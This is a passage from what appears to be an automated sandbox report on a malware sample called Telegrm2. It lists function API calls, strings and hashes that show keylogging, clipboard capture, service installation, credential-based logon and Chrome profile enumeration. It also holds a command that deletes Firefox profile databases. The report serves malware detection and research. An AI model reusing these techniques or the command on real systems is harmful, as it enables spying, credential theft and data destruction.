                                            • Instruction Fuzzy Hash: ACE01219B1334882CE1DF7B258A97FD12B5DFDAB00F599878CA0F4B742DD3885554744
                                            Function 030A1370 Relevance: 2.6, APIs: 2, Instructions: 62memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,?,00000000,030A28B9), ref: 030A13E1
                                            • VirtualFree.KERNELBASE(?,?,00000000,030A28B9), ref: 030A1415
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: 22b099a9a0ceb279cb18a48dd4b8351576473fc888246094d87800388a397386
                                            • Instruction ID: ab447d5223659d769aa4bfe7d1886caef943dfa8a1cee493df5af4eaa32c384b
                                            • Opcode Fuzzy Hash: 22b099a9a0ceb279cb18a48dd4b8351576473fc888246094d87800388a397386
                                            • Instruction Fuzzy Hash: 3821D432B21A8087C748CF6EF55031DB3A5F788B80F148521DB5A97B18EF34D8E28B44
                                            Function 030A12B0 Relevance: 2.6, APIs: 2, Instructions: 53memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VirtualAlloc.KERNELBASE(?,?,?,030A27C2), ref: 030A1303
                                            • VirtualFree.KERNEL32(?,?,?,030A27C2), ref: 030A133C
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocFree
                                            • String ID:
                                            • API String ID: 2087232378-0
                                            • Opcode ID: c7620fa8e2e65044c607154e1f8bc049c84698878f3340dbe2d286ecc7890aba
                                            • Instruction ID: 444ec511dd7f73606a7de2e70d1003ced6530ec50d181f31983209ee8b9af7c8
                                            • Opcode Fuzzy Hash: c7620fa8e2e65044c607154e1f8bc049c84698878f3340dbe2d286ecc7890aba
                                            • Instruction Fuzzy Hash: 8D11C832721B8086DB59CF79F550719F3A9E784BC4F189125DA4A87B18EF38C592CB44
                                            Function 030AE9AD Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B30BC: _errno.LIBCMT ref: 030B30E7
                                              • Part of subcall function 030B30BC: _invalid_parameter_noinfo.LIBCMT ref: 030B30F2
                                            • FindCloseChangeNotification.KERNELBASE ref: 030AE9F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3879645562-0
                                            • Opcode ID: e33c38ae5819eb9e48e9ea88f34de7988f70daf09292e8181e9fb43e05a58b4a
                                            • Instruction ID: 72e71dc7dcf207e6506dd82579c337e6ab1a9ae1c64b048a9b97a5182229f499
                                            • Opcode Fuzzy Hash: e33c38ae5819eb9e48e9ea88f34de7988f70daf09292e8181e9fb43e05a58b4a
                                            • Instruction Fuzzy Hash: FBF0302671674086CB58DBBAA4642DAA3A9B788784F445529EE4D87704EF38C204C704
                                            Function 030AE8A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B30BC: _errno.LIBCMT ref: 030B30E7
                                              • Part of subcall function 030B30BC: _invalid_parameter_noinfo.LIBCMT ref: 030B30F2
                                            • FindCloseChangeNotification.KERNELBASE ref: 030AE9F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3879645562-0
                                            • Opcode ID: fe1b2c9a00d0439b6484432930ce1f5736a7d7bb895aa72d2332d0093413d6f7
                                            • Instruction ID: dc0f62a437912229c5a893cfffbf541503bf9de0c38bff2a18997fb0db51a6f2
                                            • Opcode Fuzzy Hash: fe1b2c9a00d0439b6484432930ce1f5736a7d7bb895aa72d2332d0093413d6f7
                                            • Instruction Fuzzy Hash: BBE08C2661AB4082CB45CBA5F42038AA3A5B788784F044526AE8E43704DA38C244C708
                                            Function 030AE9D8 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B30BC: _errno.LIBCMT ref: 030B30E7
                                              • Part of subcall function 030B30BC: _invalid_parameter_noinfo.LIBCMT ref: 030B30F2
                                            • FindCloseChangeNotification.KERNELBASE ref: 030AE9F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ChangeCloseFindNotification_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 3879645562-0
                                            • Opcode ID: d6125d13708f799677689afbea7ffb082b258275de06f0192fa5187475e311fc
                                            • Instruction ID: d6b54c71b7d6b74f6691886ea1921631f0f5f4736f1815ae4e944d315426db5b
                                            • Opcode Fuzzy Hash: d6125d13708f799677689afbea7ffb082b258275de06f0192fa5187475e311fc
                                            • Instruction Fuzzy Hash: 48D01277A25B4082D715DB61B82478AA3A5F7C8798F445125AE8D47B14DE3CC155C708
                                            Function 030AE91F Relevance: 1.3, APIs: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B30BC: _errno.LIBCMT ref: 030B30E7
                                              • Part of subcall function 030B30BC: _invalid_parameter_noinfo.LIBCMT ref: 030B30F2
                                            • CloseHandle.KERNEL32 ref: 030AE957
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: CloseHandle_errno_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 4154143816-0
                                            • Opcode ID: 6968cceffff01d735b6ebd56def7f1b4ed7aa33f54521a4776e989f45e377667
                                            • Instruction ID: 20dac8c4eda637f6049f3703476539352bef50593f17614aa1c04b0a4f3fc06f
                                            • Opcode Fuzzy Hash: 6968cceffff01d735b6ebd56def7f1b4ed7aa33f54521a4776e989f45e377667
                                            • Instruction Fuzzy Hash: 02F0E23261AA54C6E751CB94F4103DAB3A9F388798F081126EF8D47B25CB7CC285CB44
                                            Function 030AE7A5 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Sleep
                                            • String ID:
                                            • API String ID: 3472027048-0
                                            • Opcode ID: 173b2ec5e022ee776b24513b541c10d14d834b8f36d2d81bd77bd2e64784ec69
                                            • Instruction ID: 2f113c5fce5466721cdd28de52c12abc0c03cd32de5f77c24ffa7b73451f996c
                                            • Opcode Fuzzy Hash: 173b2ec5e022ee776b24513b541c10d14d834b8f36d2d81bd77bd2e64784ec69
                                            • Instruction Fuzzy Hash: CCE04F2361DAC486E3828B59F0443E9A725E384BA4F0C1021DFCD07A55CAB8C1D5CB40

                                            Non-executed Functions

                                            Function 030AF8D0 Relevance: 35.1, APIs: 18, Strings: 2, Instructions: 132servicefilesleepCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B38A4: GetSystemTimeAsFileTime.KERNEL32 ref: 030B38B2
                                              • Part of subcall function 030B4238: _getptd.LIBCMT ref: 030B4240
                                            • rand.LIBCMT ref: 030AF930
                                              • Part of subcall function 030B4250: _getptd.LIBCMT ref: 030B4254
                                            • OpenSCManagerA.ADVAPI32 ref: 030AF972
                                            • CreateFileA.KERNEL32 ref: 030AF9B6
                                            • CloseHandle.KERNEL32 ref: 030AF9D1
                                            • CloseServiceHandle.ADVAPI32 ref: 030AF9DA
                                            • CreateServiceA.ADVAPI32 ref: 030AFA3A
                                            • WriteFile.KERNEL32 ref: 030AFA62
                                            • DeleteService.ADVAPI32 ref: 030AFA6F
                                            • CloseServiceHandle.ADVAPI32 ref: 030AFA78
                                              • Part of subcall function 030B22C0: GetComputerNameA.KERNEL32 ref: 030B230D
                                              • Part of subcall function 030B22C0: lstrcpy.KERNEL32 ref: 030B2323
                                              • Part of subcall function 030B22C0: wsprintfA.USER32 ref: 030B2352
                                            • CloseHandle.KERNEL32 ref: 030AFA81
                                            • CloseServiceHandle.ADVAPI32 ref: 030AFA8A
                                            • CloseHandle.KERNEL32 ref: 030AFA95
                                            • StartServiceA.ADVAPI32 ref: 030AFAA3
                                            • Sleep.KERNEL32 ref: 030AFAAE
                                            • DeleteService.ADVAPI32 ref: 030AFAC0
                                            • CloseServiceHandle.ADVAPI32 ref: 030AFAC9
                                            • CloseServiceHandle.ADVAPI32 ref: 030AFAD2
                                            • DeleteFileA.KERNEL32 ref: 030AFAE0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Service$CloseHandle$File$Delete$CreateTime_getptd$ComputerManagerNameOpenSleepStartSystemWritelstrcpyrandwsprintf
                                            • String ID: C:\ProgramData\girl.jpg$driver
                                            • API String ID: 2345241111-1437884672
                                            • Opcode ID: 9d3927efc2e86f327e81318a06defe3ff0f5a5e80a7fa5aa5fc8fe9fe512994d
                                            • Instruction ID: 1ee26918f906fa5ba28cc2e29978ce9911af4cadb257a055aae651ce7a9648df
                                            • Opcode Fuzzy Hash: 9d3927efc2e86f327e81318a06defe3ff0f5a5e80a7fa5aa5fc8fe9fe512994d
                                            • Instruction Fuzzy Hash: 9451D43122AB8186EB65DF65F82839E73A8F788B90F549215DE8E07B64DF3CC105CB04
                                            Function 030B84A8 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 200COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            • del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db, xrefs: 030B84B3
                                            • PATH, xrefs: 030B8558
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID: PATH$del /s /f %appdata%\Mozilla\Firefox\Profiles\*.db
                                            • API String ID: 2819658684-2861927837
                                            • Opcode ID: 1f337ca2c0046e2a9a43f10933a60745acdbfcd95e59333c55ee2c85e4f350e7
                                            • Instruction ID: 4c92e8e845d2eda2842826c4230f2cdbf621952e50a554f675926c1f7106d5ae
                                            • Opcode Fuzzy Hash: 1f337ca2c0046e2a9a43f10933a60745acdbfcd95e59333c55ee2c85e4f350e7
                                            • Instruction Fuzzy Hash: E551E36930339442EF68EB2599507FFA6F99BC6BD8F48C661CE650BBA4DF38C0458701
                                            Function 030ADA90 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 125synchronizationfilekeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File$CreateMutex$CloseCountDeleteFolderHandleObjectPathReleaseSingleSizeStateTickWaitlstrcat
                                            • String ID: <$\paEqfEiINh.jre$paEqfEiINh.jre
                                            • API String ID: 2154846255-3527366935
                                            • Opcode ID: c90ec30e0ae730cd492638757934f02a9159206527e090b7be205eb521341652
                                            • Instruction ID: 316b309cca4c207e533dd20479ccc0e95c091e220b1e2c0bfd1865e9a848a436
                                            • Opcode Fuzzy Hash: c90ec30e0ae730cd492638757934f02a9159206527e090b7be205eb521341652
                                            • Instruction Fuzzy Hash: D3515B71315E45C2EB21CF6AF8A875A77A8F788B88F409515DE4A47B20CF3DC249C704
                                            Function 030AF360 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 73memoryprocessthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: ProtectVirtual$CurrentProcess$CloseCreateHandleLogonThreadWith
                                            • String ID: C:\Users\Public\Music\Trace.exe$MalseclogonDomain$MalseclogonPwd$MalseclogonUser
                                            • API String ID: 1105788500-813928492
                                            • Opcode ID: c90b5ac492fb6ba54225fb440e7324f5a31df96525c86f0d5aa9d662399655ad
                                            • Instruction ID: 2085bd7fc894c413404261841c3bec7312e2267dce5e9535e50eee676e4bcb44
                                            • Opcode Fuzzy Hash: c90b5ac492fb6ba54225fb440e7324f5a31df96525c86f0d5aa9d662399655ad
                                            • Instruction Fuzzy Hash: AD312B32215B86E7DB61CF61F858B8A77B8F384344F505216DB8D43A24EF38D66ACB44
                                            Function 02DC7E60 Relevance: 18.3, APIs: 12, Instructions: 290COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 2819658684-0
                                            • Opcode ID: 64c961bb79e97a4b0cce1bc1c3f25c2806c8cd024d514268ab867f6b142047a0
                                            • Instruction ID: 75d8c92c079fef2445007a372a4cdb994d8cfaddc43cf08c69278a5bf58f1339
                                            • Opcode Fuzzy Hash: 64c961bb79e97a4b0cce1bc1c3f25c2806c8cd024d514268ab867f6b142047a0
                                            • Instruction Fuzzy Hash: 7E71C630328A0B4FEB19B7388855B7A72C7EB85314F74866DC496C3394DF64DC41EA62
                                            Function 030ADEB0 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 168stringkeyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030ADD70: GetForegroundWindow.USER32 ref: 030ADD9F
                                              • Part of subcall function 030ADD70: GetWindowTextA.USER32 ref: 030ADDBC
                                              • Part of subcall function 030ADD70: lstrlen.KERNEL32 ref: 030ADDF5
                                              • Part of subcall function 030ADD70: GetLocalTime.KERNEL32 ref: 030ADE04
                                              • Part of subcall function 030ADD70: wsprintfA.USER32 ref: 030ADE54
                                            • GetKeyState.USER32 ref: 030ADFA5
                                            • lstrlen.KERNEL32 ref: 030ADFFE
                                            • lstrlen.KERNEL32 ref: 030AE01E
                                            • lstrlen.KERNEL32 ref: 030AE046
                                            • wsprintfA.USER32 ref: 030AE06C
                                            • wsprintfA.USER32 ref: 030AE08B
                                            • wsprintfA.USER32 ref: 030AE0BE
                                            • lstrlen.KERNEL32 ref: 030AE105
                                              • Part of subcall function 030ADCA0: WaitForSingleObject.KERNEL32 ref: 030ADCBC
                                              • Part of subcall function 030ADCA0: CreateFileA.KERNEL32 ref: 030ADCEE
                                              • Part of subcall function 030ADCA0: SetFilePointer.KERNEL32 ref: 030ADD13
                                              • Part of subcall function 030ADCA0: lstrlen.KERNEL32 ref: 030ADD1C
                                              • Part of subcall function 030ADCA0: WriteFile.KERNEL32 ref: 030ADD39
                                              • Part of subcall function 030ADCA0: CloseHandle.KERNEL32 ref: 030ADD42
                                              • Part of subcall function 030ADCA0: ReleaseMutex.KERNEL32 ref: 030ADD54
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: lstrlen$wsprintf$File$Window$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleStateTextTimeWaitWrite
                                            • String ID: %s%s$[esc]
                                            • API String ID: 3231454590-1031636121
                                            • Opcode ID: 95ddf89135496d77df8a34d36fa581a21a90052be2d4c245a83ececa253a15e1
                                            • Instruction ID: 9e5bd5b721f698fe7cc6dee7e165c82669ddfec3945a43e979a395fbdbb22975
                                            • Opcode Fuzzy Hash: 95ddf89135496d77df8a34d36fa581a21a90052be2d4c245a83ececa253a15e1
                                            • Instruction Fuzzy Hash: 1D61E07121AF448BEB61CFA9F8A47A977A9F740BC4F485115EA0A47B24DF38C385DB00
                                            Function 030A4210 Relevance: 16.6, APIs: 11, Instructions: 84clipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: Clipboard$Global$DataLockWire$AllocAvailableCloseEmptyFormatOpen
                                            • String ID:
                                            • API String ID: 343666531-0
                                            • Opcode ID: f8b8a0e1675d68dbd3136f108ac89252788f65ac44dc5c59f32b586fbb6faaa9
                                            • Instruction ID: c817ae11e7a73f027212a30f224382c6e03dd3f4c586554fb1965a2ebea45552
                                            • Opcode Fuzzy Hash: f8b8a0e1675d68dbd3136f108ac89252788f65ac44dc5c59f32b586fbb6faaa9
                                            • Instruction Fuzzy Hash: B431E326216B8081EB65DBA9F42435EA3A4FB85BE0F485315DAAE07BE4DF7CC144C704
                                            Function 030B8808 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 192COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$freewcomexecmd$CurrentProcess_invalid_parameter_noinfo
                                            • String ID: cmd.exe
                                            • API String ID: 1058736139-723907552
                                            • Opcode ID: 9bdfe9058e3290fb7722a7d35efb340c72b45db3eacd3ff90ca898b3ca8969af
                                            • Instruction ID: 506bd74db7af5eb8b5f3425f1498de2610388da5f2c5c600d19c1a0d7f541654
                                            • Opcode Fuzzy Hash: 9bdfe9058e3290fb7722a7d35efb340c72b45db3eacd3ff90ca898b3ca8969af
                                            • Instruction Fuzzy Hash: 755107297033C182EE68EB26A9507EE66F9ABC5FD4F4CC5259E594BB64DE38C0028305
                                            Function 030BA244 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159fileCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            • _set_error_mode.LIBCMT ref: 030BA289
                                            • _set_error_mode.LIBCMT ref: 030BA29A
                                            • GetModuleFileNameW.KERNEL32 ref: 030BA2FC
                                              • Part of subcall function 030B5664: GetCurrentProcess.KERNEL32(?,?,?,?,030B5706), ref: 030B567C
                                            • GetStdHandle.KERNEL32 ref: 030BA411
                                            • WriteFile.KERNEL32 ref: 030BA46E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: File_set_error_mode$CurrentHandleModuleNameProcessWrite
                                            • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                            • API String ID: 2183313154-4022980321
                                            • Opcode ID: e100cb5623a7cfc0df8941c6d10efe82813637f29d3b5093f7d715a41daa83ae
                                            • Instruction ID: fee2532f0f2bca0cc3012d4f20904a393575b9ae57363452335a6369b81927ee
                                            • Opcode Fuzzy Hash: e100cb5623a7cfc0df8941c6d10efe82813637f29d3b5093f7d715a41daa83ae
                                            • Instruction Fuzzy Hash: 1F51D22531679086EB64DB35A864BDB73A8FBC9B84F4846269E9A47B44DF3CC206C604
                                            Function 030B3FA4 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 030B8BB4: _lock.LIBCMT ref: 030B8BDB
                                              • Part of subcall function 030B8BB4: _errno.LIBCMT ref: 030B8BEF
                                              • Part of subcall function 030B8BB4: _invalid_parameter_noinfo.LIBCMT ref: 030B8BFB
                                            • _errno.LIBCMT ref: 030B402B
                                            • _errno.LIBCMT ref: 030B4032
                                            • _errno.LIBCMT ref: 030B4052
                                              • Part of subcall function 030B5664: GetCurrentProcess.KERNEL32(?,?,?,?,030B5706), ref: 030B567C
                                            • _errno.LIBCMT ref: 030B405B
                                            • _errno.LIBCMT ref: 030B4065
                                            • _errno.LIBCMT ref: 030B406F
                                            • free.LIBCMT ref: 030B4095
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _errno$CurrentProcess_invalid_parameter_noinfo_lockfree
                                            • String ID: COMSPEC$cmd.exe
                                            • API String ID: 3119157571-2256226045
                                            • Opcode ID: 0761109b97946affe244a2f300aac1ec8f075fc56def3fa4435c2fe01597c384
                                            • Instruction ID: 31b4e2d91d8f1f1d702d0c4df7305aa9c43f6cf466f031e14a861323ee8fbb14
                                            • Opcode Fuzzy Hash: 0761109b97946affe244a2f300aac1ec8f075fc56def3fa4435c2fe01597c384
                                            • Instruction Fuzzy Hash: D021073A712B0089EB18DFB6E8502EE77F8FBC8384B988521CA494BE15DF34C154C750
                                            Function 02DC32BC Relevance: 15.4, APIs: 10, Instructions: 379COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904259663.0000000002DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_2db0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1457502553-0
                                            • Opcode ID: 80b182fec399e25035d94539b3a052fa9ca79bb0d7bb025d9f5049a9a06a933b
                                            • Instruction ID: 0efe77c1493481860a429d4ba486d675a49f6f9d78aa6309138d70b89660af86
                                            • Opcode Fuzzy Hash: 80b182fec399e25035d94539b3a052fa9ca79bb0d7bb025d9f5049a9a06a933b
                                            • Instruction Fuzzy Hash: EDA19231624A4A4BDB5CAF38C8593B576D6FB58315F54C1BEE806CB7A9EF34C8418B40
                                            Function 030B3904 Relevance: 15.3, APIs: 10, Instructions: 255COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2904436753.00000000030A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 030A0000, based on PE: true
                                            • Associated: 00000000.00000002.2904436753.00000000030C8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000000.00000002.2904436753.0000000003381000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_30a0000_Telegrm2.jbxd
                                            Similarity
                                            • API ID: _get_daylight$_errno_isindst$__getgmtimebuf__tzset_invalid_parameter_noinfo
                                            • String ID:
                                            • API String ID: 1457502553-0
                                            • Opcode ID: acf813a30195e167d09f2c4d1b69e88ba732c9ab7d0b54dbdaee929f12b2a7f7
                                            • Instruction ID: ddf89273afe02079f62926dfb3f7c67811c1733254ecc1e7aaba58e296f758a6
                                            • Opcode Fuzzy Hash: acf813a30195e167d09f2c4d1b69e88ba732c9ab7d0b54dbdaee929f12b2a7f7
                                            • Instruction Fuzzy Hash: 0781D2BA70274587DF68DF75D8517E963B9EB98B88F189066DA098FB48EB38C0018700
                                            Function 030AEF20 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 127fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32 ref: 030AEFF0
                                              • Part of subcall function 030BFA68: std::exception::exception.LIBCMT ref: 030BFA7B
                                              • Part of subcall function 030BFA68: std::exception::exception.LIBCMT ref: 030BFAA9
                                            Strings
                                            • *.*, xrefs: 030AEFC9
                                            • \AppData\Local\Google\Chrome\User Data\Default, xrefs: 030AEF23
                                            • invalid string position, xrefs: 030AEF9A
                                            Memory Dump Source
